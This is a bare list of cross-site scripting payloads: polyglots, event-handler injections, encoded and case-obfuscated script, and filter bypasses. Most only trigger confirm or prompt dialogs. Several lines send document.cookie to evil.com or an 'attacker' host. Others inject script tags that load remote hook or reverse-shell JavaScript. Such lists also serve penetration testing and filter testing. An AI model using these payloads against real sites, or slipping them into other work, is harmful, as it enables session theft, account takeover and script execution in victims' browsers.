javascript: /*--></title></style></textarea></script></xmp><svg/onload='+
/"/+/onmouseover=1/+/[*/ [] / +cONfiRM(document.domain); //'>
oNcliCk=cONfiRM(1)%20)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>%5Cx3csVg/<img/src/onerror=cONfiRM(2)>%5Cx3e
<iframe srcdoc="<SCRIPT>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</iframe>">
<svg><script>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</script></svg>
<img src=x &#x6f;&#x6e;&#x65;&#x72;&#x72;&#x6f;&#x72;&#x3d;&#x70;&#x72;&#x6f;&#x6d;&#x70;&#x74;&#x28;&#x31;&#x29;>
#img/src/onerror=$("body").append(decodeURIComponent('%3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3a%2f%2f%3c%65%76%69%6c%20%69%70%3e%3a%33%30%30%30%2f%68%6f%6f%6b%2e%6a%73%3e%3c%2f%73%63%72%69%70%74%3e'))>
#<img/src="1"/onerror=cONfiRM(1)>
[Click Me](javascript:cONfiRM(document.domain))
<img src=x onerror=console.log("XOkSS")>
;');cONfiRM(1)// 
hhh<img src="#" onmouseenter="prompt('hoysin')" gggg
/x:1/:///%01javascript:cONfiRM(document.cookie)/
<input onfocus="cONfiRM(0);" autofocus>
<svg onload=cONfiRM(1)>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=cONfiRM()//>
<img src=x & LName: onerror=prompt(0);>
<a href=x onfocus=cONfiRM(23) name=jj>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg onload="cONfiRM(1)" <="" svg=""
"><x/Onpointerrawupdate=confirm(document.cookie)>kira_deathnote
‟><marquee/onstart=confirm(1)>
"onfocus="cONfiRM`1`"autofocus="
 "><block%quote oncontextmenu%3Dconfirm(1)>Right click me</blockquote><!--
 javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+cONfiRM(1)//'>
$` onerror=cONfiRM(1);//
" onfocus="cONfiRM(1)" autofocus="
javaSCript://%0aconfirm(1) 
javasCript://%250aconFIRM(1) 
--!><Svg/Onload=confirm(document.domain)>
"onfocus="cONfiRM`1`"autofocus="
<!----><script>cONfiRM(0);</script>
'^cONfiRM()^'
'*cONfiRM()*'
'/cONfiRM()/'
"-cONfiRM`1`,"
window.location.replace("http://site.com/?x=3"-cONfiRM`1`,") 
">'><details/open/ontoggle=confirm('hoysin')> ⌝
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/ ⌝
&quot;&gt;&lt;img src=x onerror=confirm(1);&gt; ⌝
<img src=x:cONfiRM(alt) onerror=eval(src) alt='spyerror'>
"></tag><svg onload=cONfiRM(spyerror)>
&lt;img longdesc="src='x'onerror=cONfiRM(document.domain);//&gt;&lt;img " src='showme'&gt;
&lt;img longdesc="src=" images="" stop.png"="" onerror="cONfiRM(document.domain);//&quot;" src="x" alt="showme"&gt;
#><img src=x onerror=prompt(1);>
"><img src=x onerror=$("body").append(decodeURIComponent("%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%30%30%30%2f%72%65%76%5f%73%68%65%6c%6c%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e"))>
"><img src=x onerror=$("body").append(decodeURIComponent("%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%30%30%30%2f%72%65%76%5f%73%68%65%6c%6c%2e%68%74%6d%6c%22%3e%3c%2f%73%63%72%69%70%74%3e"))>
<script>new Image().src="http://evil.com:8090/b.php?"+document.cookie;</script>
<img/src/onerror=document.location="http://evil.com:8090/cookiez.php?c="+document.cookie>
x@x.com<--`<img/src=` onerror=cONfiRM(1)> --!>
<svg onload=fetch("//attacker/r.php?="%2Bcookie)>
javascript:cONfiRM();
//<img src=x:x onerror=cONfiRM(1)>\";cONfiRM();//";cONfiRM();//';cONfiRM();
//`;cONfiRM();// cONfiRM();//*/cONfiRM();//--></title></textarea></style></noscript></noembed>
</template></select></script><frame src=javascript:cONfiRM()><svg onload=cONfiRM()><!--
JSON.stringify("<img src=x onerror=prompt(document.domain)>");
</Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm(document.domain)>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<object data="javascript:cONfiRM(1)">
<svgonload=cONfiRM(1)>
<svg onload=cONfiRM(1)>
"><svg onload=cONfiRM(1)>
"onmouseover=prompt(1) //
<div onmouseover="cONfiRM('hoysin');">Hello :)
"autofocus onfocus=cONfiRM(1)//
"autofocus onfocus=prompt(1) //
<img="" onerror="prompt()">
<img/onerror="prompt()">
"><input/onauxclick="[1].map(prompt)">
<iframe srcdoc="&lt;script>prompt(document.domain)&lt;/script/>"></iframe>
<iframe src='jAvAsCripT:cONfiRM`1`'></iframe>
\"><frame src=javascript:cONfiRM(document.domain)>
<img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'>
<iMg SrC=x OnErRoR=cONfiRM(1)>
"><img src onerror=cONfiRM(1)>
<div onmouseover="cONfiRM('hoysin');">Move your mouse over me.
'"</Script><Html Onmouseover=(cONfiRM)(document.domain) //
</script><script>cONfiRM(1)</script>
</script><img onerror=prompt(1)>
<svg><animate xlink:href=#x attributeName=href values=&#106;avascript:cONfiRM(1) /><a id=x><rect width=100 height=100 /></a>
a id="test1"></a><a id="test1" name="test2" href="x:cONfiRM(2)">
</a>2<a id="test1"></a><a id="test1" name="test2" href="x:cONfiRM(2)"></a>
1")%3bcONfiRM(document.cookie%2b"
?param=111/u0026;typ=55577%5D%22)%3bcONfiRM(document.cookie)%3b//
<output name="jAvAsCriPt://&NewLine;\u0061ler&#161(1)" onclick="eval(name)">X</output>
'-cONfiRM(1)-'
\'-cONfiRM(1)//
"+cONfiRM(1));<!--
'-prompt(1)//
\'-prompt(1)//
str<script>cONfiRM(1)<\/script>ing
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=cONfiRM() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=cONfiRM()//>\x3e
†‡•＜img src=a onerror=javascript:cONfiRM('test')>…‰€
